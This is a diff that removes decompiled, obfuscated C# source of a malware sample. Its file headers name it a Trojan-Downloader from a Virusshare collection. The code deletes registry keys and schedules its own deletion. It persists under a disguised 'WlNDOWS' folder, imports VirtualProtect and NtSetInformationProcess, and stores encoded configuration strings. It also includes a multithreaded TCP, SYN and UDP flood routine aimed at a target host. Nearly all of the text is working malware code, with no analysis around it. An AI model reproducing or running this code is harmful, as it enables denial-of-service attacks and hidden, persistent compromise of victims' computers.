Registry.LocalMachine.DeleteSubKey(ґ.ᖢ("XlpRX2JMXVBnWHRufXp+enF/Z0xuf3SBcCsLqSumXnB/gHtnVHl+f2x3d3BvK056eHt6eXB5f35n", true) + ґ.ᖢ(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.މᆻƑሣū\u0011ሥыᯪ, true));
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
switch (ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.\u05C5\u066CҼƹߛƹ)
|
|
||||||
{
|
|
||||||
case RegistryHive.CurrentUser:
|
|
||||||
Registry.CurrentUser.DeleteSubKey(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᒳኣˋୣʎ\u1249ᯋĢ);
|
|
||||||
break;
|
|
||||||
case RegistryHive.LocalMachine:
|
|
||||||
Registry.LocalMachine.DeleteSubKey(ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ.ᒳኣˋୣʎ\u1249ᯋĢ);
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
ዽᓻᏃ\u0709տ.ᦌᕛ();
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void ᦌᕛ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
string tempFileName = Path.GetTempFileName();
|
|
||||||
File.Delete(tempFileName);
|
|
||||||
File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
|
|
||||||
ᔂଋᦑ\u0FD4Ỉ\u0F3Dଫ.ŧຝ`\u0D55ਪᐬઑዧḵ(tempFileName, (string) null, ᔂଋᦑ\u0FD4Ỉ\u0F3Dଫ.\u194F.ኧᄶሳ);
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public enum \u00B3ዪؤ
|
|
||||||
{
|
|
||||||
\u0340\u17F2ໄɑ,
|
|
||||||
ᴖᡝ\u0DF4ᥝ\u16FF̆Ṩࢪ,
|
|
||||||
ᗃᏼ,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,44 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ᎎ૰౩ᙼሼ༾Ϗݻໟ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using Microsoft.Win32;
|
|
||||||
using System;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ᎎ\u0AF0౩ᙼሼ༾Ϗݻໟ
|
|
||||||
{
|
|
||||||
public static string ᵵ\u19DAᱤᩪྡ\u0AF0ᰙ = "ub63yMK3yrfEhMTFVlx2YIO/xoS4v9CUiJSH0g==";
|
|
||||||
public static string ἤუᔴ\u05C3 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\WlNDOWS\\Services";
|
|
||||||
public static string ᕽᕅ\u0C73 = "psW/xMq7yKm7Vlx2YMjMv7m7hLvOuw==";
|
|
||||||
public static string ᑫඖᥫϸ\u1AA9\u0E77᧕ = "6gEQ8wH9EpykBhQB3wgFAQoQ";
|
|
||||||
public static string \u1316্ཬ = "6gEQ8wH9EpykBhQB3wgFAQoQ";
|
|
||||||
public static string މᆻƑሣū\u0011ሥыᯪ = "F9TO3uDTzd/OyeDT09HJ0NLe4ZykBhTJ3eLTzcni4s7e3t7O097R090Z";
|
|
||||||
public static string \u070Cకዃ = "7R86O1GRVOR5";
|
|
||||||
public static string ýۇ\u0DCBȾᘬķ = "1.6";
|
|
||||||
public static string ᡀ\u0EA4 = "Plugins";
|
|
||||||
public static string ᒳኣˋୣʎ\u1249ᯋĢ = "Software\\Microsoft\\Protected Storage System Provider";
|
|
||||||
public static string \u0CCFលṧᎣ = "C6krpjw=";
|
|
||||||
public static string \u0746ᕫ̠ࠨᦓଣ = string.Empty;
|
|
||||||
public static int \u0D56ၴ = 10;
|
|
||||||
public static bool ൺግ = true;
|
|
||||||
public static bool იዡิᣰ\u0E89̗ެ\u1CB0 = true;
|
|
||||||
public static bool \u1C86ۂƼডಽ = false;
|
|
||||||
public static bool ầ\u05F4 = false;
|
|
||||||
public static bool ǕቤᨫᨷÀᵗ᳠ᷬ\u0380 = false;
|
|
||||||
public static bool ݝȮ᯳ᴨເ\u17F3 = false;
|
|
||||||
public static bool \u0D81ᶸጞऒ = false;
|
|
||||||
public static bool \u0BF7ᕯ\u187Eᠥᮞ\u066B\u0FF2ᶥ = false;
|
|
||||||
public static bool \u0DEE = false;
|
|
||||||
public static bool डத\u00A9Ẫ = false;
|
|
||||||
public static bool ሠဝ\u1B4F\u0FDCỖᑑᕒ = false;
|
|
||||||
public static bool \u0093\u08D9ሻჭ = true;
|
|
||||||
public static bool ឨ = true;
|
|
||||||
public static bool ሕ = false;
|
|
||||||
public static RegistryHive \u05C5\u066CҼƹߛƹ = RegistryHive.CurrentUser;
|
|
||||||
public static byte[] \u0DFAԚᇺ\u18AFᛮዒᆄ = (byte[]) null;
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,73 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ᑏᨚݺ۴ᑈ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.Net;
|
|
||||||
using System.Text;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ᑏᨚݺ۴ᑈ
|
|
||||||
{
|
|
||||||
private static Thread ঊ\u09B5દտஈᛘč;
|
|
||||||
private static List<\u08F6ᝀ\u08C3> ӓṀဲЊဥᴋਟồ = new List<\u08F6ᝀ\u08C3>();
|
|
||||||
|
|
||||||
public static void ϜᣰᆽβೄหकԢᄬ(\u08F6ᝀ\u08C3 _param0) => ᑏᨚݺ۴ᑈ.ӓṀဲЊဥᴋਟồ.Add(_param0);
|
|
||||||
|
|
||||||
public static void ऴᨻت\u1F16ሏரᡢ͕ᩞ(\u08F6ᝀ\u08C3 _param0) => ᑏᨚݺ۴ᑈ.ӓṀဲЊဥᴋਟồ.Remove(_param0);
|
|
||||||
|
|
||||||
public static void \u0AE9ሢ\u0E75()
|
|
||||||
{
|
|
||||||
ᑏᨚݺ۴ᑈ.ঊ\u09B5દտஈᛘč = new Thread(new ThreadStart(ᑏᨚݺ۴ᑈ.Вઝìቅ));
|
|
||||||
ᑏᨚݺ۴ᑈ.ঊ\u09B5દտஈᛘč.Start();
|
|
||||||
}
|
|
||||||
|
|
||||||
private static void Вઝìቅ()
|
|
||||||
{
|
|
||||||
WebClient webClient = new WebClient();
|
|
||||||
while (true)
|
|
||||||
{
|
|
||||||
while (ᑏᨚݺ۴ᑈ.ӓṀဲЊဥᴋਟồ.Count >= 1)
|
|
||||||
{
|
|
||||||
ᑏᨚݺ۴ᑈ.ᐥ\u0897Ӏ();
|
|
||||||
for (int index = 0; index < ᑏᨚݺ۴ᑈ.ӓṀဲЊဥᴋਟồ.Count; ++index)
|
|
||||||
{
|
|
||||||
if (index < ᑏᨚݺ۴ᑈ.ӓṀဲЊဥᴋਟồ.Count && ᑏᨚݺ۴ᑈ.ӓṀဲЊဥᴋਟồ[index] != null && ᑏᨚݺ۴ᑈ.ӓṀဲЊဥᴋਟồ[index].ᦹ)
|
|
||||||
ᑏᨚݺ۴ᑈ.ӓṀဲЊဥᴋਟồ[index].ᐫḅӯȉڛ(new \u173AݎᮜఝỼᔩ\u0AFEҊᇅ(\u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6.\u0E61, Encoding.Default.GetBytes(ᑏᨚݺ۴ᑈ.ᐥ\u0897Ӏ())).\u1A76Ἢཿ());
|
|
||||||
}
|
|
||||||
Thread.Sleep(TimeSpan.FromSeconds(60.0));
|
|
||||||
}
|
|
||||||
Thread.Sleep(5000);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void \u0A4DงᆦӮᥓᏰ()
|
|
||||||
{
|
|
||||||
if (ᑏᨚݺ۴ᑈ.ঊ\u09B5દտஈᛘč == null)
|
|
||||||
return;
|
|
||||||
ᑏᨚݺ۴ᑈ.ঊ\u09B5દտஈᛘč.Abort();
|
|
||||||
}
|
|
||||||
|
|
||||||
private static string ᐥ\u0897Ӏ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
WebClient webClient = new WebClient();
|
|
||||||
double tickCount = (double) Environment.TickCount;
|
|
||||||
webClient.DownloadData("http://google.com/");
|
|
||||||
double num = Math.Floor((double) Environment.TickCount - tickCount) / 1000.0;
|
|
||||||
Math.Round(num, 0);
|
|
||||||
return Math.Round(1024.0 / num).ToString() + " KB\\Sec";
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
return "Error";
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,47 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ᔂଋᦑ࿔Ỉ༽ଫ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ᔂଋᦑ\u0FD4Ỉ\u0F3Dଫ
|
|
||||||
{
|
|
||||||
[DllImport("kernel32.dll", EntryPoint = "MoveFileEx", CharSet = CharSet.Unicode, SetLastError = true)]
|
|
||||||
public static extern bool ŧຝ`\u0D55ਪᐬઑዧḵ(
|
|
||||||
string Ⴝ᳞᷒,
|
|
||||||
string ݾįݧᎫไᵬᗤዅ,
|
|
||||||
ᔂଋᦑ\u0FD4Ỉ\u0F3Dଫ.\u194F ਯ);
|
|
||||||
|
|
||||||
[DllImport("kernel32.dll", EntryPoint = "VirtualProtect", SetLastError = true)]
|
|
||||||
public static extern bool ဋཉύᇢ\u1CB8η\u08B5Θե(
|
|
||||||
IntPtr _param0,
|
|
||||||
uint ᵼԆᙞ,
|
|
||||||
uint _param2,
|
|
||||||
out uint _param3);
|
|
||||||
|
|
||||||
[DllImport("Kernel32.dll", EntryPoint = "RtlZeroMemory")]
|
|
||||||
public static extern void \u0E67ᥟӣۄąŽΤ(IntPtr _param0, IntPtr _param1);
|
|
||||||
|
|
||||||
[DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", SetLastError = true)]
|
|
||||||
public static extern int ԩߏ(IntPtr _param0, int ʫʌᅶ, ref int _param2, int _param3);
|
|
||||||
|
|
||||||
[DllImport("kernel32.dll", EntryPoint = "GetModuleHandle", CharSet = CharSet.Auto)]
|
|
||||||
public static extern IntPtr \u1047ژÚ(string _param0);
|
|
||||||
|
|
||||||
[Flags]
|
|
||||||
public enum \u194F
|
|
||||||
{
|
|
||||||
\u082Bવᨪ = 1,
|
|
||||||
ᓸ = 2,
|
|
||||||
ኧᄶሳ = 4,
|
|
||||||
\u033Aԧ᪰ᆅ\u0ADD = 8,
|
|
||||||
\u0ED2੬\u02F4ᬄ\u0ECFᯱ = 16, // 0x00000010
|
|
||||||
ъ᭮ᐮਉ\u0C50\u173F݅ቿ = 32, // 0x00000020
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,297 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ᘒː᪤ǡᖶŐ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Net.Sockets;
|
|
||||||
using System.Text;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ᘒː\u1AA4ǡᖶŐ
|
|
||||||
{
|
|
||||||
private static ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11 ᚴͧ֯ᗺ\u0D78\u0F0B౨;
|
|
||||||
private static bool Ѓഅᅽ\u0C4Fz\u104C\u12D7༩;
|
|
||||||
private static string ᣨ;
|
|
||||||
private static int \u09F8ߛї\u07BDܩټྴ;
|
|
||||||
private static int \u124F\u0E3F\u0FFEͻ᪵Ľ;
|
|
||||||
private static int ṸА;
|
|
||||||
private static int \u180BỚᵬᷪ;
|
|
||||||
private static \u08F6ᝀ\u08C3 ᐯٔլ์ᚖᓠ;
|
|
||||||
private static string[] ᖇɒᘹنṠ\u0DE2 = new string[28]
|
|
||||||
{
|
|
||||||
"[XZikoqWWqZ6XoZpwVYKIfno1PxLEVWtjZXBVjJ6jmaSsqFWDiV4=]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==]",
|
|
||||||
"[XYKkl56hmoWdpKOaVYh4hWJqamVlZIqIZGZjZV5Vg5qpe6eko6lkaGNlVYKChWRnY2VVXZikojU/EsSllqmel6GacFV8pKScoZqXpKlkZ2NmcFWdqamlb2RkrKysY5ykpJyhmmOYpKJkl6SpY52poqFe]",
|
|
||||||
"[kJqjklVdjDU/EsSeo4OJcFWKXg==]",
|
|
||||||
"[XZikoqWWqZ6XoZpwVYKIfnpVbGNlcDU/EsRVjJ6jmaSsqFWDiVVqY2ZwVZecm6leVQ==]",
|
|
||||||
"[XZikoqWWqZ6XoZpwVYI1PxLEiH56VWtjZXBVjJ6jaGde]",
|
|
||||||
"[XY1mZnBVinBVgZ6jqq1VZ2NpY2diZ1Weam1rcFWao2KKiHA1PxLEVaJmbV5VfJqYoKRkZ2VlZmVmaGZVg5qpqJiWpZprZGtjZWY=]",
|
|
||||||
"[XY1mZnBVinBVgZ6jqq1Vnmtta3BVmqNiiog1PxLEcFWnq29lY25jaF5VfJqYoKRkZ2VlZmVtZWY=]",
|
|
||||||
"[XYiqo4SIVWpjbVWoqqNpqnA1PxLEVYpeVYSlmqeWVWpjZVWQmqOS]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq0]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq1]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq2]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq3]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq4]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq5]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq6]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq7]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq8]",
|
|
||||||
"[XYKWmJ6jqaSonXBVinBVfqOpmqFVgpaYVYSIVY1VZmVjaXBVmqNiiog1PxLEcFWnq29mY26Xal5VfJqYoKRkZ2VlbWVoZ2tmblV7nqeam6StZGhjZZdq9]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==0]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==1]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==2]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==3]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==4]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==5]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==6]",
|
|
||||||
"[XYyeo5mkrKhwVYpwVYyeo5mkrKhVg4lVamNmcFWao2KKiHBVp6tvZmNtY2VjajU/EsReVXyamKCkZGdlZWtlbGhmVXuep5qbpK1kZmNqY2VjalV7oaSYoGRlY2xjaWNmVQ==7]"
|
|
||||||
};
|
|
||||||
private static string[] \u1AE9᷅ཾᴃᬵᥘ = new string[10]
|
|
||||||
{
|
|
||||||
"[XH6JeHt7D52zZnA+Qj0/Lw==]",
|
|
||||||
"[XH6JeHt7D52zZnA+Qj1ALw==]",
|
|
||||||
"[XH6JeHt7D52zZnA+Qj1FLw==]",
|
|
||||||
"[3gAL+v39kVEyU/LAxb/BsQ==]",
|
|
||||||
"[3gAL+v39kVEyU/LAxb/BybE=]",
|
|
||||||
"[3gAL+v39kVEyU/LAxr/BsQ==]",
|
|
||||||
"[4AH2A/KRUTJTwMq/xMSx]",
|
|
||||||
"[4AH2A/KRUTJTwMq/wbE=]",
|
|
||||||
"[4AH2A/KRUTJTwMm/ysGx]",
|
|
||||||
"[4AH2A/KRUTJTwMq/ycGx]"
|
|
||||||
};
|
|
||||||
|
|
||||||
public static ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11 \u0A57\u1B5Dᗬݷᅰ\u0EC5ഒസ => ᘒː\u1AA4ǡᖶŐ.ᚴͧ֯ᗺ\u0D78\u0F0B౨;
|
|
||||||
|
|
||||||
public static string \u0F2Dᠲፙᛩ
|
|
||||||
{
|
|
||||||
get
|
|
||||||
{
|
|
||||||
switch (ᘒː\u1AA4ǡᖶŐ.ᚴͧ֯ᗺ\u0D78\u0F0B౨)
|
|
||||||
{
|
|
||||||
case ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11.ũƽᝯᡝᵵ:
|
|
||||||
return ґ.ᖢ("XwupK6ZOWw==", true);
|
|
||||||
case ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11.\u17F8:
|
|
||||||
return ґ.ᖢ("[SYN]", true);
|
|
||||||
case ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11.\u0C81ᑯȝ\u16FC:
|
|
||||||
return ґ.ᖢ("GsVgm/IJFQ==", true);
|
|
||||||
case ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11.\u0866\u0D3B\u088Cǖ:
|
|
||||||
return ґ.ᖢ("GDE0PMVgm/IxNDcuOA==", true);
|
|
||||||
default:
|
|
||||||
return (string) null;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static bool ᜐ\u05EDנձϟ\u0FE2ᵪङ => ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩;
|
|
||||||
|
|
||||||
public static void \u1B61ۨ(
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11 _param0,
|
|
||||||
string _param1,
|
|
||||||
int _param2,
|
|
||||||
int _param3,
|
|
||||||
int _param4,
|
|
||||||
int _param5,
|
|
||||||
\u08F6ᝀ\u08C3 ၺچˍŹᤄŴ)
|
|
||||||
{
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.ᚴͧ֯ᗺ\u0D78\u0F0B౨ = _param0;
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.ᣨ = _param1;
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.\u09F8ߛї\u07BDܩټྴ = _param2;
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.\u124F\u0E3F\u0FFEͻ᪵Ľ = _param3;
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.\u180BỚᵬᷪ = _param4;
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.ṸА = _param5;
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.ᐯٔլ์ᚖᓠ = ၺچˍŹᤄŴ;
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩ = false;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void \u10CEвᑟ\u193Dᷝȅ()
|
|
||||||
{
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩ = true;
|
|
||||||
new Thread(new ThreadStart(ᘒː\u1AA4ǡᖶŐ.ѮԱᝒ)).Start();
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void \u0AFEૃᭇ() => ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩ = false;
|
|
||||||
|
|
||||||
private static void ѮԱᝒ()
|
|
||||||
{
|
|
||||||
for (int index = 0; index < ᘒː\u1AA4ǡᖶŐ.\u124F\u0E3F\u0FFEͻ᪵Ľ; ++index)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
new Thread(new ThreadStart(ᘒː\u1AA4ǡᖶŐ.\u1BB5୭\u0AC6\u09DBᢗ\u0EE1ɡො))
|
|
||||||
{
|
|
||||||
IsBackground = true
|
|
||||||
}.Start();
|
|
||||||
}
|
|
||||||
catch (OutOfMemoryException ex)
|
|
||||||
{
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.\u124F\u0E3F\u0FFEͻ᪵Ľ = index - 1;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
private static void \u1BB5୭\u0AC6\u09DBᢗ\u0EE1ɡො()
|
|
||||||
{
|
|
||||||
int num = 0;
|
|
||||||
while (ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩ && ᘒː\u1AA4ǡᖶŐ.ᐯٔլ์ᚖᓠ.ᦹ)
|
|
||||||
{
|
|
||||||
switch (ᘒː\u1AA4ǡᖶŐ.ᚴͧ֯ᗺ\u0D78\u0F0B౨)
|
|
||||||
{
|
|
||||||
case ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11.ũƽᝯᡝᵵ:
|
|
||||||
Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
|
|
||||||
socket1.Blocking = false;
|
|
||||||
while (num < ᘒː\u1AA4ǡᖶŐ.\u180BỚᵬᷪ && ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩)
|
|
||||||
{
|
|
||||||
if (ᘒː\u1AA4ǡᖶŐ.ᐯٔլ์ᚖᓠ.ᦹ)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
socket1.Connect(ᘒː\u1AA4ǡᖶŐ.ᣨ, ᘒː\u1AA4ǡᖶŐ.\u09F8ߛї\u07BDܩټྴ);
|
|
||||||
socket1.Send(ᘒː\u1AA4ǡᖶŐ.ঊᬤصᔏพၓƚ());
|
|
||||||
socket1.Close();
|
|
||||||
socket1 = (Socket) null;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
socket1.Close();
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
++num;
|
|
||||||
Thread.Sleep(1);
|
|
||||||
}
|
|
||||||
else
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
Thread.Sleep(ᘒː\u1AA4ǡᖶŐ.ṸА);
|
|
||||||
break;
|
|
||||||
case ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11.\u17F8:
|
|
||||||
Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
|
|
||||||
socket2.Blocking = false;
|
|
||||||
try
|
|
||||||
{
|
|
||||||
socket2.BeginConnect(ᘒː\u1AA4ǡᖶŐ.ᣨ, ᘒː\u1AA4ǡᖶŐ.\u09F8ߛї\u07BDܩټྴ, new AsyncCallback(ᘒː\u1AA4ǡᖶŐ.ኦ\u19E4ẋʳ), (object) null);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
Thread.Sleep(100);
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (socket2.Connected)
|
|
||||||
socket2.Disconnect(false);
|
|
||||||
socket2.Close();
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
Thread.Sleep(ᘒː\u1AA4ǡᖶŐ.ṸА);
|
|
||||||
break;
|
|
||||||
case ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11.\u0C81ᑯȝ\u16FC:
|
|
||||||
Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
|
|
||||||
socket3.Blocking = false;
|
|
||||||
Socket socket4;
|
|
||||||
try
|
|
||||||
{
|
|
||||||
socket3.Connect(ᘒː\u1AA4ǡᖶŐ.ᣨ, ᘒː\u1AA4ǡᖶŐ.\u09F8ߛї\u07BDܩټྴ);
|
|
||||||
while (num < ᘒː\u1AA4ǡᖶŐ.\u180BỚᵬᷪ && ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩ && ᘒː\u1AA4ǡᖶŐ.ᐯٔլ์ᚖᓠ.ᦹ)
|
|
||||||
{
|
|
||||||
